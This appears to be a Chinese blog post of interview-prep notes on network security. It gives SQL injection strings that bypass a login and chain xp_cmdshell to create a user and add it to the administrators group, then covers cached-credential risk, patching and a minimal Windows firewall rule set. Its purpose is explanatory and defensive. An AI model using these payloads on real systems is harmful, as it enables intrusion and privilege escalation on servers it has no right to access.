当前位置 博文首页 > Lanje Wang的博客:面试准备-计算机网络
种木马、创建账号-开启远程桌面-编辑内部数据
利用sql 注入可以加 aa' or 'a'='a? 骗过登录
更狠一点可以执行存储过程给计算机加用户、用户加进管理员组、改注册表
aa' or 'a'='a';exec XP_cmdshell 'net user lisi5 al! /add
aa' or 'a'='a';exec XP_cmdshell 'net localgroup administratoes? lisi5??/add
做完之后远程桌面连接
?
打个比方:我有自己的一台服务器,我在公司电脑用xhell 连接过。那就记录了连接的凭证缓存。这时有人要是入侵了我的公司电脑就能利用这个缓存凭证
?
系统厂家(比如说微软)发现了漏洞,肯定第一时间想解决办法,然后发布补丁让大家下载更新。如果不更新,这个被公开的漏洞就是服务器的坑。(445共享文件夹漏洞)
只开80别的不开,远程桌面只对自己开3389,出去策略只管域名解析。
这样哪怕服务器有木马,那也是卧槽马。
入站规则:80 443 tcp 网站访问
出站规则:53 udp 域名解析
? ? ? ? ? ? ? ? ? ICMPv4? ping
? ? ? ? ? ? ? ? ? 3389 tcp 远程桌面RDP 在加上作用域设置自己的ip
?
?
?
?
?
?
?
参考视频:?https://ke.qq.com/course/299889?taid=3208220311327601
cs